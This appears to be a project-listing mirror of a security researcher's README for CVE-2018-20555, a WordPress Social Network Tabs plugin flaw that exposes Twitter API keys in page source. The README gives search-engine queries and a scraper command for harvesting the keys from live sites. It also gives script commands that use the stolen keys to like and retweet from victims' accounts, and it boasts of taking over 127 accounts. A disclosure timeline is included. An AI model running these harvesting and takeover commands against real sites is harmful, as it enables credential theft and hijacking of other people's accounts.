GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → fs0c131y → Cve 2018 20555

fs0c131y / Cve 2018 20555

Social Network Tabs Wordpress Plugin Vulnerability - CVE-2018-20555

Programming Languages

python
139335 projects - #7 most used programming language

Labels

wordpresswordpress-plugininfosecvulnerabilitycve

Projects that are alternatives of or similar to Cve 2018 20555

Wprecon
WPrecon (WordPress Recon), is a vulnerability recognition tool in CMS Wordpress, developed in Go and with scripts in Lua.
Stars: ✭ 135 (+73.08%)
Mutual labels:  wordpress, wordpress-plugin, vulnerability, cve
Faraday
Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distributing, indexing, and analyzing the data generated during a security audit.
Stars: ✭ 3,198 (+4000%)
Mutual labels:  infosec, vulnerability, cve
Esfileexploreropenportvuln
ES File Explorer Open Port Vulnerability - CVE-2019-6447
Stars: ✭ 595 (+662.82%)
Mutual labels:  infosec, vulnerability, cve
Vulnerability Data Archive
With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools
Stars: ✭ 63 (-19.23%)
Mutual labels:  vulnerability, cve
Wordpress Zero Spam
The WordPress Zero Spam plugin makes blocking spam a cinch without all the bloated options. Just install, activate, and say goodbye to spam.
Stars: ✭ 56 (-28.21%)
Mutual labels:  wordpress, wordpress-plugin
Wp Rest Api Log
WordPress plugin for logging REST API requests and responses
Stars: ✭ 58 (-25.64%)
Mutual labels:  wordpress, wordpress-plugin
Images Via Imgix
imgix WordPress plugin
Stars: ✭ 51 (-34.62%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Base Plugin
A starter template for WordPress plugins, with autoloading, namespaces and object caching (where available).
Stars: ✭ 65 (-16.67%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Progressive Web Apps
WordPress Mobile Plugin including a Progressive Web App implemented with React
Stars: ✭ 64 (-17.95%)
Mutual labels:  wordpress, wordpress-plugin
Wp Gistpen
A self-hosted alternative to putting your code snippets on Gist.
Stars: ✭ 67 (-14.1%)
Mutual labels:  wordpress, wordpress-plugin
Mainwp Child
The MainWP Child plugin is installed on the WordPress sites that you want to control from the MainWP Dashboard.
Stars: ✭ 74 (-5.13%)
Mutual labels:  wordpress, wordpress-plugin
Better Rest Endpoints
A WordPress plugin that serves up slimmer WP Rest API endpoints.
Stars: ✭ 56 (-28.21%)
Mutual labels:  wordpress, wordpress-plugin
Wl Bootstrap
Integrating Laravel into WordPress
Stars: ✭ 54 (-30.77%)
Mutual labels:  wordpress, wordpress-plugin
Theme My Login
Home of the Theme My Login plugin for WordPress.
Stars: ✭ 60 (-23.08%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Cloud Media Offloader Plugin
A simple plugin that allows you to serve your WordPress Media Library files from the Backblaze B2 cloud storage service.
Stars: ✭ 52 (-33.33%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Indieweb
Helps you establish your IndieWeb identity by extending the user profile to provide rel-me and h-card fields. It also includes a bundled installer for a core set of IndieWeb-related plugins.
Stars: ✭ 64 (-17.95%)
Mutual labels:  wordpress, wordpress-plugin
Query Monitor
The Developer Tools Panel for WordPress
Stars: ✭ 1,156 (+1382.05%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Plugin Installer
A PHP class for installing and activating WordPress plugins.
Stars: ✭ 69 (-11.54%)
Mutual labels:  wordpress, wordpress-plugin
Ossf Cve Benchmark
The OpenSSF CVE Benchmark consists of code and metadata for over 200 real life CVEs, as well as tooling to analyze the vulnerable codebases using a variety of static analysis security testing (SAST) tools and generate reports to evaluate those tools.
Stars: ✭ 71 (-8.97%)
Mutual labels:  vulnerability, cve
Bitcoin Wordpress Plugin
GoUrl Official Bitcoin Payment Gateway for Wordpress 3.5+ (or higher). Sell Products, Files, Digital Downloads, Membership on your website. Accept Bitcoin, Litecoin, Dogecoin, Darkcoin, Reddcoin, etc Payments Online. Use Pay-Per-Download, Pay-Per-Product, Pay-Per-Membership, Pay-Per-Page/Video-Access on your website. It is Easy!
Stars: ✭ 49 (-37.18%)
Mutual labels:  wordpress, wordpress-plugin
View All Similar Projects ➔

CVE-2018-20555

The Wordpress Plugin called Social Network Tabs, made by the company Design Chemical, is leaking twice the Twitter access_token, access_token_secret, consumer_key and consumer_secret of their user which is leading to a takeover of their Twitter account.

This is caused by the following lines of code within the page where the Twitter widget is displayed:

jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});

Exploitation

Thanks to Publicwww, with the following search queries, I managed to retrieve the Twitter access_token, access_token_secret, consumer_key and consumer_secret from 539 vulnerable websites:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

All the keys are available in twitter_keys.csv.

How to

Test the Twitter API keys in twitter_keys.csv

python test_twitter_api_keys.py -t

The 1st time I had run this command, I got the information of 446 Twitter accounts. It's worth mentioning that there were 2 verified accounts in the list and multiple accounts with more than 10K+ followers. All the vulnerable accounts are in vulnerable_accounts.txt.

Fun part

Like the tweet of your choice

python test_twitter_api_keys.py -l [tweet_id]

Retweet the tweet of your choice

python test_twitter_api_keys.py -r [tweet_id]

The 1st time I run this command, I managed to liked the tweet of my choice 127 times, which shown that 127 Twitter api keys had the read write rights aka I was able to take over 127 Twitter accounts (change profile picture, like, retweet, change bio,...) due to this key leaks.

UPDATE 17/01/18

A lot of websites and so Twitter accounts are still vulnerable to this issue. In order to identify them, I created a scraper

cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

The total of results for this Google search query is 3550. Among the 9 first pages, I managed to retrieved 78 keys (86%). Enjoy!

Disclosure

  • 01/12/18: Disclosure to Twitter
  • 0X/12/18: Twitter deactivated all the keys
  • 11/12/18: Acknowledgement as a valid security issue by Twitter

Contact

Follow me on Twitter! You can also find a small part of my work at https://fs0c131y.com

Credits

The investigation and the POC has been made with ❤️ by @fs0c131y

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].